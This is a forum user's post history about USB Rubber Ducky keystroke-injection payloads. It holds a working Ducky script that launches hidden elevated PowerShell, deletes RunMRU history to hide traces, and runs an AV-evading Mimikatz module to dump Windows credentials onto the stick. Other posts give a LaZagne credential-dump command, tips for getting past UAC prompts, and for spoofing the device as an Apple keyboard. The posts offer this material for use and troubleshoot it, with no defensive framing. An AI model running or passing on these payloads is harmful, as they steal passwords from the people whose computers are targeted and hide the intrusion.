L07TB0Y
-
Posts
42 -
Joined
-
Last visited
Posts posted by L07TB0Y
-
-
here is my code
DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
ENTER
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 1000
ALT Y
DELAY 1000
LEFTARROW
DELAY 300
ENTER
DELAY 500
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d
DELAY 300
ENTER
DELAY 1000
STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';"
DELAY 300
ENTERissue 1:
THE UAC is not going away by either ALT Y or LEFTARROW and ENTER but even after this if i click OK manually it does not work
FILES is the name of rubber ducky
lb.ps1 is the customized mimi that does not get detected by AV etc
what am i doing wrong?
-
-
what version of windows 10 are you using? home, enterprise? is it patched?
-
i found it on https://www.ducktoolkit.com/ as well but that does not tell you what to name the file so i named it vidpid.bin and it seems to work
-
check out Darren and Snubs youtube channel that is a wealth of knowledge. In any case if you are lazy you can change the PIV/DIV of the ducky to make it look like an apple keyboard and apple will not ask you to setup the keyboard.
check out the wiki for the rest of your stuff
-
i have twin ducky flashed and i want to keep it but i want to swap my PIV/DIV to Apple keyboard is it possible?
-
On 1/15/2017 at 1:30 PM, rpc72 said:
Starting Windows 8, passwords are no long stored in memory in the same way that can be reversed.
not ture mimikatz still works in win10 i just tested
-
STRING %DUCKYdrive%\lazagne.exe all
you have to remove drive from the %DUCKYdrive%
to write to usb
STRING %DUCKY%\lazagne.exe all | Out-File '%DUCKY%\%computername%_creds.txt';"
-
so when ever i need to leverage a administrator powershelgl it prompts me to say OK on UAC. Alt Y does not work. I have even tried left arrow and space bar but what i have found is i need to do Alt Tab and than left arrow and space but there is no Alt Tab in ducky so anyone found a work around that works?
-
well looks like win10 is now blocking scripts it could vie becuse i am running win 10 enterprise
PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Ou
t-File '%duck%\%computername%_creds.txt';"
.\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information,
see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module ...
+ ~~~~~~~~
+ CategoryInfo : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess -
On 1/14/2017 at 3:08 PM, henna3 said:
I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the uac prompt comes up, it comes up as an non-active window. So, when alt+y is being pressed its not being pressed in the uac prompt window. Is there any way to fix this issue/workaround?
Amazing twin duck payload!
Thanks.
did you find a solution? i am running into the same thing and well even if i choose to run the UAC i am not getting a file so
-
i just got my ducky and i am in the research phase so can any one tell me why do the twin duck when the ducky-decode does the mass storage and multiple payloads etc
-
if you are not good with tech what are you doing with a rubber ducky?
-
why the development on this has stopped? this sounds like a wonderfull tool especially the twin duck and multiple payloads
New WPA/WPA Attack - Hashcat PMKID
in Hacks & Mods
Posted
now can someone port it over to PineApple